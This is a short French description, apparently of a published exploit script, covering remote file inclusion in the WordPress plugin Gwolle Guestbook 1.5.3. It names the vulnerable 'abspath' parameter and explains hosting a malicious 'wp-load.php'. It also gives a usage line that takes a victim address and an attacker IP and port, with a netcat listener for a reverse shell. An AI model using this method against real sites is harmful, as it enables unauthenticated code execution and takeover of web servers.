
Plugin WordPress Gwolle Guestbook 1.5.3 - Inclusion de fichier distant
Ce script Python exploite une vulnérabilité critique d'inclusion de fichier distant (RFI) dans le plugin WordPress Gwolle Guestbook, qui peut être exploitée par un attaquant non authentifié pour inclure un fichier PHP distant et exécuter du code arbitraire sur le système vulnérable.
Le paramètre HTTP GET "abspath" n'est pas correctement assaini avant d'être utilisé dans la fonction PHP require(). Un attaquant distant peut inclure un fichier nommé 'wp-load.php' depuis un serveur distant arbitraire et exécuter son contenu sur le serveur web vulnérable. Pour ce faire, l'attaquant doit placer un fichier 'wp-load.php' malveillant dans la racine des documents de son serveur et inclure l'URL du serveur dans la requête.
L'exploitation réussie de cette vulnérabilité peut entraîner le compromis de toute l'installation WordPress, et peut même conduire au compromis de l'ensemble du serveur web.
Le script nécessite trois arguments :
Exemple :
python3 exploit.py VICTIM_IP/WORDPRESS ATTACKER_IP ATTACKER_PORTRemarque : Vous devez avoir un écouteur netcat ouvert sur la machine attaquante sur le port spécifié.
Ce script est fourni à des fins éducatives uniquement. L'auteur n'est pas responsable des dommages causés par une mauvaise utilisation de ce script.